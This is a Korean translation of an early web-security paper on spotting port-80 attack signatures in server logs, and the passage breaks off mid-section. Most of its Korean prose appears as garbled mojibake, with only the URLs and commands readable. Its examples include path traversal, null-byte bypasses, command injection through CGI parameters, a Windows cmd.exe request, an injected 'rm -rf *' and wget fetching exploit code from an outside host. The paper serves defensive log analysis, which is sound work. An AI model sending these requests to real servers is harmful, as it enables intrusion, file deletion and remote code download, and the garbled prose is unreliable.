ÀúÀÚ: Zenomorph E-Mail:admin@cgisecurity.com "FingerprintingÀ» ÀÌ¿ëÇÑ 80 Æ÷Æ®(À¥¼­¹ö) °ø°Ý¹ýµé" À¥¼­¹ö¿Í À¥ ÀÀ¿ëÇÁ·Î±×·¥À» °ø°ÝÇϱâ À§ÇÑ ¹®ÀÚ(±âÈ£)µéÀ» »ìÆ캻´Ù. ¿ø¹®: http://www.cgisecurity.com/papers/fingerprint-port80.txt ¹ø¿ªÀÚ: jjshim@hanaro.com(2001-11-8) I. ¼­·Ð II. ÀϹÝÀûÀÎ Fingerprints III. °í±Þ Fingerprints IV. ¿À¹ö Ç÷οö Fingerprints V. Hex ¾Ïȣȭ - (ħÀÔŽÁö ½Ã½ºÅÛÀ» ÇÇÇϱâ À§ÇÑ) VI. °á·Ð I. ¼­·Ð 80 Æ÷Æ®´Â À¥»çÀÌÆ®¸¦ À§ÇÑ Ç¥ÁØÀûÀÎ Æ÷Æ®À̸ç, ÀÌ À¥»çÀÌÆ®¿¡´Â ¸¹Àº º¸¾ÈÀ§Çè ¿ä¼Ò¸¦ °¡Áö°í ÀÖ´Ù. ÀÌµé º¸¾È À§Çè ¿ä¼Ò´Â °ø°ÝÀÚ°¡ À¥¼­¹öÀÇ °ü¸®ÀÚ ±ÇÇÑÀ» ȹµæÇÒ ¼ö Àְųª ½ÉÁö¾î À¥¼­¹ö ÀÚü¸¦ ÀÚ½ÅÀÇ °ÍÀ¸·Î ¸¸µé ¼ö ÀÖ´Ù. ÀÌ ¹®¼­´Â ¾à°£ÀÇ ¹®ÀÚ(±âÈ£)¸¦ Á¶ÇÕÇÏ¿© À¥¼­¹ö¸¦ °ø°ÝÇÏ´Â ¿¹¸¦ º¸¿©ÁÖ¸ç, ´ç½ÅÀº ÀÌ °ø°Ý±âÈ£µéÀ» À¥·Î±× ÆÄÀÏ ¾È¿¡¼­ º¼ ¼ö ÀÖ´Ù. II. ÀϹÝÀûÀÎ Fingerprints ÀÌ ´Ü¶ô¿¡¼­´Â ÀϹÝÀûÀÎ Fingerprints¸¦ Çϱâ À§ÇÑ À¥ ÀÀ¿ëÇÁ·Î±×·¥°ú À¥¼­¹öÀÇ °ø°ÝÄڵ带 »ç¿ëÇÏ´Â ¿¹¸¦ º¸¿© ÁÙ °ÍÀÌ´Ù. ¿©±â¼­´Â ´ç½Å¿¡°Ô »ç¿ë°¡´ÉÇÑ ¸ðµç Fingerprints¸¦ º¸¿©ÁÖÁö´Â ¾ÊÀ» °ÍÀÌ´Ù. ±× ´ë½Å ÀϹÝÀûÀ¸·Î »ç¿ëÇÏ´Â °ø°Ý ±âÈ£µéÀ» °£·«ÇÏ°Ô º¸°Ô µÉ °ÍÀÌ´Ù. ÀÌµé ¹®ÀÚ(±âÈ£)ÀÇ ´ëºÎºÐÀº ÀÌ¹Ì ¾Ë·ÁÁ® ÀÖÁö¸¸ ¾ÆÁ÷ ¾Ë·ÁÁöÁö ¾ÊÀº Ãë¾àÇÑ ¹®ÀÚ(±âÈ£)µéÀ» ¼±ÅÃÇÏ¿© °ø°ÝÀÚµéÀº °ø°ÝÇÒ ¼öµµ ÀÖ´Ù. ¾Æ·¡ ±âÈ£´Â º¸Åë À¥ ¼­ºñ½º¿¡¼­ »ç¿ëµÉ ¼ö ÀÖÁö¸¸, °ø°Ý½Ã¿¡µµ »ç¿ëµÉ ¼ö ÀÖ´Ù. "." ".." ±×¸®°í "..."ÀÇ ¿äûµé ÀÌµé ´ëºÎºÐÀÇ °ø°Ý ±âÈ£µéÀº À¥ ÀÀ¿ëÇÁ·Î±×·¥À̳ª À¥¼­¹ö¿¡¼­ µÑ´Ù »ç¿ëÇÒ ¼ö ÀÖ´Â ÀϹÝÀûÀÎ °ø°Ý ÄÚµåÀÌ´Ù. À¥¼­¹ö¿¡ Á¢±ÙÇϱâ À§ÇÑ µð·ºÅ丮 º¯°æÀ̳ª ¹ö±×¸¦ ã±â À§ÇØ °ø°ÝÀÚ´Â °ø°³µÈ ±â¹ýµéÀ» µ¿¿øÇÏÁö´Â ¾Ê´Â´Ù. °ÅÀÇ ´ëºÎºÐÀÇ Ãë¾àÁ¡Àº CGI ¹ö±×¸¦ ÀÌ¿ëÇÑ´Ù. ¾Æ·¡ ".."À» ¿äûÇÑ ¿¹¸¦ º¸ÀÚ * http://host/cgi-bin/lame.cgi?file=../../../../etc/motd ÀÌ°ÍÀº °ø°ÝÀÚ°¡ ´ç½ÅÀÇ À¥¼­¹ö¿¡°Ô "Message Of The Day"ÆÄÀÏÀÎ /etc/motdÆÄÀÏ ³»¿ëÀ» ¿äûÇÑ´Ù. ÀÌ°ÍÀÌ ¼º°øÇÑ´Ù¸é °ø°ÝÀÚ´Â ´ç½ÅÀÇ À¥¼­¹ö ·çÆ® ±ÇÇÑÀ» ȹµæ ÇѴٰųª ÀÏ¹Ý »ç¿ëÀÚ ±ÇÇÑÀ» ȹµæÇϱâ À§ÇØ ÃæºÐÇÑ Á¤º¸¸¦ ¸ðÀ¸´Â °ÍÀÌ °¡´ÉÇÒ ¼ö ÀÖ´Ù. "%20" ¿äûÇϱâ ÀÌ°ÍÀº °ø¹éÀ» À§ÇÑ Hex°ªÀÌ´Ù. ÀÌ°ÍÀº ´ç½ÅÀÇ ·Î±×ÆÄÀÏ ¾È¿¡¼­ ÀÚÁÖ ³ªÅ¸³ª±âµµ ÇÏÁö¸¸ °ø°ÝÄڵ尡 ¾Æ´Ò ¼öµµ ÀÖ´Ù. À¥¼­¹ö°¡ ½ÇÇàµÇ°í ÀÖ´Â µ¿¾È ¸î¸î ÀÀ¿ëÇÁ·Î±×·¥µéÀÌ ÀÌ ¹®ÀÚ¸¦ »ç¿ëÇÒ ¼öµµ ÀÖ´Ù. ·Î±×ÆÄÀϾȿ¡¼­ À̵éÀ» ±¸º° ÇÒ ÁÙ ¾Ë¾Æ¾ß ÇÑ´Ù. ´Ù¸¥ ÇÑÆíÀ¸·Î´Â, ÀÌ ¿äûÀÌ ¶§¶§·Î ½Ã½ºÅÛ ¸í·ÉÀ» ½ÇÇàÇÏ´Â °ÍÀ» µ½´Âµ¥ »ç¿ëµÉ ¼ö ÀÖ´Ù. ¾Æ·¡ ¿¹¸¦ º¸ÀÚ. * http://host/cgi-bin/lame.cgi?page=ls%20-al| (ls -alÀº À¯´Ð½º ¸í·É¿¡¼­ »ç¿ëµÇ´Â °ÍÀÌ´Ù.) À§ÀÇ ¿¹Á¦´Â °ø°ÝÀÚ°¡ ls¸í·É¾î¸¦ À¯´Ð½ºÀÇ ¸í·ÉÀÎÀÚ¿Í ÇÔ²² ±¸¼ºÇÏ¿© ½ÇÇàÇÏ´Â °ÍÀ» º¸¿©ÁØ´Ù. ÀÌ ¸í·ÉÀÎÀÚ´Â µð·ºÅ丮³»ÀÇ ¸ðµç ÆÄÀÏ ¸®½ºÆ®¸¦ º¸±â À§ÇØ ¼­¹ö¿¡ ¿äûÇÏ´Â °ÍÀÌ´Ù. ÀÌ°ÍÀº ´ç½ÅÀÇ ½Ã½ºÅÛ À§¿¡ Áß¿äÇÑ ÆÄÀϵéÀ» °ø°ÝÀÚ°¡ Á¢±ÙÇÏ´Â °ÍÀ» Çã¶ôÇÒ ¼ö ÀÖ°í, ´õ ³ª¾Æ°¡ °ø°ÝÀÚ¿¡°Ô ´õ ³ôÀº ±ÇÇÑÀ» ¾ò´Â ¹æ¹ý¿¡ ´ëÇÑ ¾ÆÀ̵ð¾î¸¦ ÁÙ ¼ö ÀÖ´Ù. "%00" ¿äûÇϱâ. ÀÌ°ÍÀº NULLÀ» À§ÇÑ hex°ªÀÌ´Ù. ÀÌ°ÍÀº À¥ ÀÀ¿ëÇÁ·Î±×·¥ÀÌ Á¤»óÆÄÀÏÀ» ¿äûÇÑ °ÍÀ¸·Î »ý°¢ÇÏ°Ô ¸¸µé¾î °ø°ÝÀÚÀÇ ÆÄÀÏ Å¸ÀÔÀ» ¼ÓÀ̴µ¥ »ç¿ëµÉ¼ö ÀÖ´Ù. ¾Æ·¡ ¿¹¸¦ º¸ÀÚ. * http://host/cgi-bin/lame.cgi?page=index.html À§ÀÇ ¿¹Á¦´Â Á¤»óÀ¸·Î À¥¼­¹ö¿¡°Ô ¿äûÇÏ´Â °æ¿ì ÀÌ´Ù. ¸¸¾à °ø°ÝÀÚ°¡ À§ÀÇ ¿äû¿¡ ´ëÇÏ¿© Ãë¾àÁ¡ÀÌ ÀÖ´ÂÁö¸¦ ã±â À§ÇÑ °ÍÀ̶ó¸é ¾Æ·¡¿Í °°ÀÌ ÀÔ·ÂÇØ¾ß ÇÑ´Ù. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd À¥¼­¹ö´Â ÆÄÀÏ È®ÀåÀÚ°¡ .htm, .html, .shtmlȤÀº ´Ù¸¥ ÆÄÀÏ Å¸ÀÔ¿¡ ´ëÇÏ¿©¸¸ Çã¿ëÇϱ⠶§¹®¿¡ À§ÀÇ ¿¹Á¦´Â ¿äûÀ» ºÒÇã ÇÒ ¼ö ÀÖ´Ù. À¥¼­¹ö¿¡ À§¿Í °°Àº ¿äûÀÌ µé¾î¿À¸é ¼­¹ö´Â ÀûÀýÇÑ ÆÄÀÏ Å¸ÀÔÀÌ ¾Æ´Ï¶ó°í ´ç½Å¿¡°Ô ÀÀ´äÀ» ÁÖ°Ô µÉ °ÍÀÌ´Ù. Á»´õ Á¤È®ÇÏ°Ô ±×°ÍÀº °ø°ÝÀÚ¿¡°Ô ÆÄÀÏÀÌ Á¤È®ÇÑ filenameÀ¸·Î ³¡³ª¾ß ÇÑ´Ù°í ¸»ÇÒ °ÍÀÌ´Ù. ¿©±â¼­ °ø°ÝÀÚ´Â ´ç½ÅÀÇ ½Ã½ºÅÛ¿¡ °üÇÑ ¸¹Àº Á¤º¸¸¦ ȹµæÇϱâ À§ÇØ ½Ã½ºÅÛ ÆÄÀϵéÀÌ À§Ä¡ÇÑ Æнº¸¦ Á¤È®È÷ ¾Ë·Á°í ÇÒ °ÍÀÌ´Ù. * http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html ÀÌ ¿äûÀº ¼­¹ö¿¡°Ô ¹Ì¸® Á¢±Ù °¡´ÉÇϵµ·Ï Á¤ÀÇµÈ ÆÄÀÏ ÇüÅ·Π¼ÓÀ̱â À§Çؼ­ »ç¿ëµÈ´Ù. ¸î¸î À¥ ÀÀ¿ëÇÁ·Î±×·¥µéÀº º¸Åë ÀϹÝÀûÀÎ Á¢±Ù °¡´ÉÇÑ ÆÄÀϵéÀ» ¼ÓÀÏ ¼ö Àֱ⠶§¹®¿¡ °ø°ÝÀڵ鿡 ÀÇÇØ »ç¿ëµÇ´ÂÁö¸¦ Á¶»çÇÏ¿©¾ß ÇÑ´Ù. "|" ¿äûÇϱâ ÀÌ°ÍÀº ÆÄÀÌÇÁ ¹®ÀÚ·Î, À¯´Ð½ºÀÇ º¹ÀâÇÑ ¸í·ÉµéÀ» Çѹø¿¡ ½ÇÇàÇϱâ À§ÇØ ÇÊ¿äÇÑ ±âÈ£ÀÌ´Ù. ¿¹Á¦: #cat access_log| grep -i ".." ÀÌ°ÍÀº access_logÆÄÀÏ ¾È¿¡¼­ °ø°ÝÀÚµéÀÌ ".."¸¦ ¿äûÇÑ°ÍÀ» ã±â À§ÇØ »ç¿ëµÇ´Â ¸í·É¾î ÀÌ´Ù. Á¾Á¾ ħÀÔŽÁö ½Ã½ºÅÛÀÇ ·Î±×µéÀº À¥ ÀÀ¿ëÇÁ·Î±×·¥µéÀÌ Á¤»óÀûÀ¸·Î »ç¿ëÇÏ´Â ÀÌ·¯ÇÑ ¿äûÀ» °ø°Ý¼º ÄÚµå·Î ÀνÄÇÏ´Â °æ¿ìµµ ¹ß»ýÇÑ´Ù. ±×·¯¹Ç·Î ´ç½ÅÀÇ À¥ ¼­¹ö ÀÀ¿ëÇÁ·Î±×·¥µéÀÌ ÀÌ·¯ÇÑ Á¤»ó Äڵ带 ¹ß»ý½ÃÅ°´ÂÁö¿¡ ´ëÇÑ ½ÃÇèÀ» ÅëÇÏ¿© ÇãÀ§ ŽÁö Á¤º¸¸¦ ÆÇ´ÜÇÏ¿©¾ß ÇÑ´Ù. ¸î¸î ¿¹Á¦µéÀÌ ¾Æ·¡¿¡ ÀÖ´Ù. * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls| ÀÌ ¿äûÀº º¸Åë ls¸í·É¾î¸¦ ½ÇÇàÇϱâ À§ÇÑ °ÍÀÌ´Ù. À§ÀÇ ¿äû¿¡ Á¶±Ý ´Ù¸¥ º¯È­¸¦ Á־¸é, * http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc| ÀÌ ¿äûÀº À¯´Ð½º ½Ã½ºÅÛÀÇ /etc µð·ºÅ丮ÀÇ ¸ðµç ³»¿ëÀ» º¼ ¼ö ÀÖ´Ù. * http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame" ÀÌ ¿äûÀº cat¸í·ÉÀ» ½ÇÇàÇÏ¿© access_logÆÄÀÏ ³»¿ëÁß¿¡ lame¹®ÀÚ¿­À» ã´Â °ÍÀÌ´Ù. ¹°·Ð grep¸í·É¾îÀÇ i¿É¼Çµµ ÇÔ²² »ç¿ëÇÏ¿´´Ù. ";" ¿äûÇϱâ. ÀÌ°ÍÀº º¹ÇÕÀûÀÎ ¸í·ÉµéÀ» ¿¬¼ÓÀûÀ¸·Î À¯´Ð½º ½Ã½ºÅÛ À§¿¡¼­ ½ÇÇàµÇ°Ô ÇÏ´Â ¹®ÀÚÀÌ´Ù. ¿¹Á¦: #id;uname -a (id¸í·ÉÀ» ½ÇÇàÇÑ ÀÌÈÄ uname¸í·É¾î¸¦ ½ÇÇàÇÕ´Ï´Ù) Á¾Á¾ ¼­¹ö³»ÀÇ ÇÁ·Î±×·¥µéÀÌ ½Ã°£À» Ç¥ÇöÇϱâ À§ÇØ »ç¿ëµÇ´Â ¹®ÀÚÀÏ ¼ö ÀÖÁö¸¸, ħÀÔŽÁö ½Ã½ºÅÛ¿¡¼­ °æº¸¸¦ ¹ß»ý½Ãų ¼öµµ ÀÖ´Ù. Çѹø ´ç½ÅÀÇ ÀÀ¿ëÇÁ·Î±×·¥µéÀ» Á¡°ËÇÏ¿© ħÀÔŽÁö ½Ã½ºÅÛÀÇ ·êÀ» Àç Àû¿ëÇÏ¸é ¸¹Àº ¿À¿ëŽÁö¸¦ ¸·À» ¼ö ÀÖ´Ù. "<" and ">" ¿äûÇϱâ. ÀÌ ¹®ÀÚµéÀº ¸¹Àº ÀÌÀ¯·Î ÀÎÇÏ¿© ħÀÔŽÁö ·Î±×¿¡¼­ üũµÇ¾î Áø´Ù. ÀÌ ¹®ÀÚ¸¦ »ç¿ëÇϴ ù¹ø° ÀÌÀ¯´Â ÆÄÀÏÀÇ ÀÔÃâ·ÂÀ» º¯°æÇϰųª ÆÄÀÏ ³»¿ëÀ» Ãß°¡ÇÒ¶§ »ç¿ëµÇ¾î Áø´Ù. ¿¹Á¦ 1: #echo "your hax0red h0 h0" >> /etc/motd ÀÌ°ÍÀº /etc/motdÆÄÀϾȿ¡ ³»¿ëÀ» ¾²´Â °ÍÀ» º¸¿©ÁØ´Ù. °ø°ÝÀÚ´Â ´ç½ÅÀÇ À¥»çÀÌÆ®¸¦ ¼Õ»ó½ÃÅ°±â À§ÇØ ÀÌ·¸°Ô °£´ÜÇÑ ¿äûÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. rain.forest.puppy¿¡ ÀÇÇØ À¯¸íÇØÁø RDS °ø°ÝÄÚµå´Â ¸Å¹ø echo¸í·ÉÀ» »ç¿ëÇÏ¿© À¥»çÀÌÆ®ÀÇ ¸ÞÀÎ ÆäÀÌÁö¸¦ º¯°æÇϴµ¥ »ç¿ëÇÏ¿´´Ù. Ưº°ÇÑ Æ÷¸äÀÌ ¾ø´Â À¥»çÀÌÆ® ÇØÅ·¿¡´Â echo¸í·ÉÀ» ÀÌ¿ëÇÑ °ÍÀ» attrition.org¿¡¼­ ãÀ» ¼ö ÀÖ´Ù. Example 2: http://host/something.php=Hi%20mom%20I'm%20Bold! ÀÌ ¿äûÀº Å©·Î½º »çÀÌÆ® ¼­¹ö ½ºÅ©¸³Æà °ø°Ý ¿¹Á¦ÀÌ´Ù. ´ç½ÅÀº htmlÅ×Å©¸¦ »ç¿ëÇÏ¿© "<"³ª ">" ¹®ÀÚ¸¦ À¥ ¼­¹ö¿¡ ¾µ ¼ö ÀÖ´Ù. ÀÌ °ø°ÝÀº »ç¿ëÀÚ°¡ ¿ø·¡ Á¢¼ÓÇÏ·Á´ø À¥ »çÀÌÆ®ÀÇ Á¢¼ÓÀ» Â÷´ÜÇÏ°í ¶È°°Àº À¥»çÀÌÆ®·Î ¸µÅ©¸¦ ¸¸µé¾î »ç¶÷µéÀ» ¼Ó¿© ÀÚ½ÅÀÌ Á¢¼ÓÇÑ À¥¼­¹ö Á¤º¸°¡ Á¤È®ÇÏ´Ù°í ¼ÓÀ̵¥ »ç¿ëÇÒ ¼ö ÀÖ´Ù. (¹°·Ð, °ø°ÝÀÌ ¼º°øÇÏ·Á¸é ¶È°°Àº À¥»çÀÌÆ® ¸µÅ©°¡ ÇÊ¿äÇÏ´Ù.-) (Á¢¼ÓÇÏ´Â hex°ªÀÌ ¾Ïȣȸ µÈ´Ù¸é ÀÌ·¯ÇÑ ¼­¹ö »çÀÌÆ® ½ºÅ©¸³Æà °ø°ÝÀº ¸·À» ¼ö ÀÖ´Ù.) "!" ¿äûÇϱâ ÀÌ ¹®ÀÚ´Â Á¾Á¾ SSL(Server Side Include)°ø°Ý¿¡ »ç¿ëµÈ´Ù. ÀÌµé °ø°ÝÀº °ø°ÝÀÚ°¡ »ç¿ëÀÚµéÀÌ À߸øµÈ À¥ »çÀÌÆ® ¸µÅ©¸¦ Ŭ¸¯ÇÏ´Â °Í°ú °°Àº Å©·Î½º »çÀÌÆ® ½ºÅ©¸³Æà °ø°Ý°ú ºñ½ÁÇÑ °á°ú¸¦ °¡Á®¿Ã ¼ö ÀÖ´Ù. ¾Æ·¡ ¿¹Á¦¸¦ º¸¶ó. http://host1/something.php= À߸ø ÀÛ¼ºµÈ php ÇÁ·Î±×·¥Àº ¿ø°ÝÁö³ª ·ÎÄÿ¡¼­ À¥¼­¹ö ±ÇÇÑÀÇ ¸í·É¾î¸¦ ½ÇÇàÇÒ ¼ö ÀÖ´Ù. ÀÌ Ãë¾àÁ¡¿¡ ´õÇÏ¿© °ø°ÝÀÚ´Â hex°ªÀ» ¾Ïȣȭ ÇÏ¿© µ¿ÀÏÇÏ°Ô ¿äûÇÒ ¼ö ÀÖ´Ù. ±×·¯¹Ç·Î ´ç½ÅÀº ÀÛ¼ºµÈ ÇÁ·Î±×·¥À» ¼¼¹ÐÇÏ°Ô Á¡°ËÇÏ¿©¾ß ÇÑ´Ù. "`" ¿äûÇϱâ. "`"¹®ÀÚ´Â perl¿¡¼­ ¸í·É¾î¸¦ ½ÇÇàÇϴµ¥ ÀÚÁÖ »ç¿ëµÇ¾î Áø´Ù. ÀÌ ¹®ÀÚ´Â º¸Åë À¥ ¼­¹ö ÇÁ·Î±×·¥¿¡¼­´Â »ç¿ëµÇÁö ¾Ê´Â´Ù. ±×·¯¹Ç·Î ´ç½ÅÀº ÀÌ°ÍÀÌ ¾ó¸¶³ª Ÿ´çÇÑ ·Î±×ÀÎÁö¸¦ ÁÖÀDZí°Ô »ìÆ캼 ÇÊ¿ä°¡ ÀÖ´Ù. ¾Æ·¡ ¿¹Á¦¸¦ º¸¶ó. http://host/something.cgi=`id` ÀÌ°ÍÀº Ãë¾àÇÑ perl·Î ÀÛ¼ºµÈ ÇÁ·Î±×·¥¿¡¼­ "id"¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Ù´Â °ÍÀ» º¸¿© ÁØ´Ù. III. °í±Þ Fingerprints ÀÌ Àå¿¡¼­´Â °ø°ÝÀÚ°¡ ¿äûÇÒ ¼ö ÀÖ´Â ÆÄÀϵé°ú ÇÔ²² ´õ ¸¹Àº ½ÇÇà°¡´ÉÇÑ ¸í·É¾î¸¦ »ç¿ëÇÏ´Â ¹æ¹ý¿¡ ´ëÇÏ¿© ÃÊÁ¡À» ¸ÂÃâ °ÍÀÌ´Ù. °ø°ÝÀÚ´Â ¿ø°ÝÁö ½Ã½ºÅÛÀÇ ¿ÏÀüÇÑ ¸í·ÉÀ̳ª ÆÄÀϵéÀÇ ¸ñ·ÏÀ» ¿äûÇÏÁö´Â ¸øÇÏÁö¸¸ ´ç½ÅÀÇ ½Ã½ºÅÛÀ» ¹è°æÀ¸·Î ÃæºÐÇÑ ¾ÆÀ̵ð¾î¸¦ Á¦°øÇØ ÁÙ ¼ö ÀÖ´Ù. * Ãë¾àÁ¡ÀÌ Á¸ÀçÇÒ¶§ °ø°ÝÀÚ°¡ »ç¿ëÇÒ ¼ö ÀÖ´Â ÀϹÝÀûÀÎ ¸í·É¾î. "/bin/ls" ÀÌ°ÍÀº ls¸í·É¾îÀÎ ¹ÙÀ̳ʸ® ÆÄÀÏÀÌ´Ù. º¸Åë À¥ ÀÀ¿ëÇÁ·Î±×·¥¿¡ ȦÀÌ Á¸ÀçÇÏ¸é ¹ÙÀ̳ʸ® ÆÄÀÏÀÇ Àüü Æнº¸íÀ» »ç¿ëÇÏ¿© ¿äûÇÑ´Ù. ¸¸¾à ´ç½ÅÀÇ À¥ ·Î±×¿¡¼­ ÀÌ ¸í·É¾î¸¦ ¹ß°ßÇÑ´Ù¸é ¿ø°ÝÁö¿¡¼­ ·ÎÄà ½Ã½ºÅÛÀÇ ¸í·É¾î¸¦ ½ÇÇà ÇÒ ¼ö ÀÖ´Ù´Â °ÍÀ» º¸¿©ÁØ´Ù. ¶§¶§·Î ÇãÀ§ °æº¸ÀÏ ¼ö ÀÖÀ¸¹Ç·Î Ç×»ó ¹®Á¦°¡ µÉ¼ö ¾ø´Ù. °¡´ÉÇÏ´Ù¸é ´ç½ÅÀÇ À¥ ÇÁ·Î±×·¥¿¡¼­ ÀÌ·¯ÇÑ ·Î±× ÆÄÀÏ°ú µ¿ÀÏÇÏ°Ô ½ÃÇèÇÏ¿© º¸°í ±× °á°ú°ªÀ» ¿¬±¸ÇÒ ÇÊ¿ä°¡ ÀÖ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=ls%20-al; "cmd.exe" ÀÌ°ÍÀº À©µµ¿ì ½© ÀÌ´Ù. ¸¸¾à °ø°ÝÀÚ°¡ ÀÌ À©µµ¿ì ½©À» ½ÇÇà ÇÒ ¼ö ÀÖ´Ù¸é ¼­¹ö ±ÇÇÑ¿¡ ÀÇÁöÇÏ°í ÀÖ´Â À©µµ¿ì ½Ã½ºÅÛÀº ¾î¶°ÇÑ ¸í·ÉÀÌ¶óµµ ½ÇÇà ÇÒ ¼ö ÀÖ´Ù. °ÅÀÇ ´ëºÎºÐÀÇ ÀÎÅÍ³Ý ¿ú ¹ÙÀÌ·¯½º´Â Æ÷Æ® 80¹øÀ» ÀÌ¿ëÇÏ¿© ÀÌ cmd.exe¸¦ ÀÌ¿ëÇÑ´Ù. ¶ÇÇÑ °¨¿°µÈ ¼­¹ö´Â cmd.exe¸¦ »ç¿ëÇÏ¿© ¶Ç ´Ù¸¥ ½Ã½ºÅÛ¿¡°Ô ¹ÙÀÌ·¯½º¸¦ ÀüÆĽÃÅ°±âµµ ÇÑ´Ù. http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:\ "/bin/id" ÀÌ°ÍÀº À¯´Ð½ºÀÇ "id"¸í·É¿¡ ´ëÇÑ ¹ÙÀ̳ʸ® ÆÄÀÏÀÌ´Ù. º¸Åë À¥ ÀÀ¿ëÇÁ·Î±×·¥¿¡ ȦÀÌ Á¸ÀçÇÏ¸é ¹ÙÀ̳ʸ® ÆÄÀÏÀÇ Àüü Æнº¸íÀ» »ç¿ëÇÏ¿© ¿äûÇÑ´Ù. ¸¸¾à ´ç½ÅÀÇ À¥ ·Î±×¿¡¼­¿¡ ÀÌ ¸í·É¾î¸¦ ¹ß°ßÇÑ´Ù¸é ¿ø°ÝÁö¿¡¼­ ·ÎÄà ½Ã½ºÅÛÀÇ ¸í·É¾î¸¦ ½ÇÇà ÇÒ ¼ö ÀÖ´Ù´Â °ÍÀ» º¸¿©ÁØ´Ù. ¶§¶§·Î ÇãÀ§ °æº¸ÀÏ ¼ö ÀÖÀ¸¹Ç·Î Ç×»ó ¹®Á¦°¡ µÉ¼ö ¾ø´Ù. °¡´ÉÇÏ´Ù¸é ´ç½ÅÀÇ À¥ ÇÁ·Î±×·¥¿¡¼­ ÀÌ·¯ÇÑ ·Î±× ÆÄÀÏ°ú µ¿ÀÏÇÏ°Ô ½ÃÇèÇÏ¿© º¸°í ±× °á°ú°ªÀ» ¿¬±¸ÇÒ ÇÊ¿ä°¡ ÀÖ´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/id| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=id; "/bin/rm" ÀÌ°ÍÀº À¯´Ð½ºÀÇ "rm"¸í·É¿¡ ´ëÇÑ ¹ÙÀ̳ʸ® ÆÄÀÏÀÌ´Ù. º¸Åë À¥ ÀÀ¿ëÇÁ·Î±×·¥¿¡ ȦÀÌ Á¸ÀçÇÏ¸é ¹ÙÀ̳ʸ® ÆÄÀÏÀÇ Àüü Æнº¸íÀ» »ç¿ëÇÏ¿© ¿äûÇÑ´Ù. ¸¸¾à ´ç½ÅÀÇ À¥ ·Î±×¿¡¼­¿¡ ÀÌ ¸í·É¾î¸¦ ¹ß°ßÇÑ´Ù¸é ¿ø°ÝÁö¿¡¼­ ·ÎÄà ½Ã½ºÅÛÀÇ ¸í·É¾î¸¦ ½ÇÇà ÇÒ ¼ö ÀÖ´Ù´Â °ÍÀ» º¸¿©ÁØ´Ù. ¶§¶§·Î ÇãÀ§ °æº¸ÀÏ ¼ö ÀÖÀ¸¹Ç·Î Ç×»ó ¹®Á¦°¡ µÉ¼ö ¾ø´Ù. ÀÌ ¸í·ÉÀº, ´Ù¸¥ ÇÑÆíÀ¸·Î´Â, °ø°ÝÀÚ³ª »ç¿ëÀÚ¿¡ ÀÇÇÏ¿© »ç¿ëµÇµçÁö ¾çÂÊ´Ù ÆÄÀÏÀ» »èÁ¦ÇÏ´Â °ÍÀ» Çã¿ëÇϱ⠶§¹®¿¡ »ó´çÈ÷ À§ÇèÇÏ´Ù. °¡´ÉÇÏ´Ù¸é ´ç½ÅÀÇ À¥ ÇÁ·Î±×·¥¿¡¼­ ÀÌ·¯ÇÑ ·Î±× ÆÄÀÏ°ú µ¿ÀÏÇÏ°Ô ½ÃÇèÇÏ¿© º¸°í ±× °á°ú°ªÀ» ¿¬±¸ÇÒ ÇÊ¿ä°¡ ÀÖ´Ù. ¸¸¾à ÀÌ·¯ÇÑ ½ÃÇèÀ» ÇÏ°íÀÚ ÇÑ´Ù¸é ½Ã½ºÅÛ³»ÀÇ Áß¿äÇÑ ÆÄÀϵ鿡 ´ëÇؼ­´Â Á¡°ËÇÏ°í »ç¿ëÇÏ±æ ¹Ù¶õ´Ù. ¸¸¾à stupid.txtÆÄÀÏÀ» »èÁ¦ÇÑ´Ù¸é, ±×°ÍÀº À¥ »çÀÌÆ®³»ÀÇ ·çÆ® µð·ºÅ丮¿¡ º¸¿©ÁöÁö´Â ¾Ê´Â´Ù. Å×½ºÆ®ÇÒ ¸ñÀûÀ̶ó¸é »õ·ÎÀÌ ÆÄÀÏÀ» ¸¸µç´ÙÀ½ ½ÃÇèÇÏ¿© º¸¶ó. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*; "wget, tftp" ¸í·É¾î ÀÌ ¸í·ÉÀº °ø°ÝÀÚ°¡ ¼­¹ö¿¡ ÆÄÀÏÀ» ´Ù¿î·Îµå ÇϱâÀ§ÇØ »ç¿ëµÇ°Å³ª ¹ÙÀÌ·¯½º¸¦ ÀüÆÄÇϱâ À§ÇØ ÀÚÁÖ »ç¿ëµÈ´Ù. ¶§·Ð °ø°ÝÀÚ°¡ »ç¿ëÀÚ ±ÇÇÑÀ» ÇÑÃþ ´õ ³ôÀ̱â À§ÇØ »ç¿ëµÇ±âµµ ÇÑ´Ù. wgetÀº À¯´Ð½º ¸í·É¾î·Î ¹éµµ¾î¸¦ ½É±âÀ§ÇØ ´Ù¿î·ÎµåÇÒ¶§ »ç¿ëµÇ¾î Áø´Ù. tftp ¸í·É¾î´Â À¯´Ð½º³ª NT¸ðµÎ¿¡¼­ »ç¿ë°¡´ÉÇÑ ÆÄÀÏ ´Ù¿î·Îµå ¸í·ÉÀÌ´Ù. ¸î¸î IIS ¹ÙÀÌ·¯½º´Â tftp¸í·É¾î¸¦ »ç¿ëÇÏ¿© ÀڽŵéÀ» º¹Á¦Çϴµ¥ »ç¿ëµÇ¾î Áö¸ç, ¶ÇÇÑ ´Ù¸¥ ½Ã½ºÅÛÀ¸·Î ÀüÀÌÇϱâ À§ÇØ »ç¿ëµÇ¾î Áø´Ù. ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| ¿¹Á¦: http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c; "cat" ¸í·É¾î ÀÌ ¸í·É¾î´Â ÆÄÀÏÀÇ ³»¿ëÀ» º¸´Âµ¥ ÀÚÁÖ 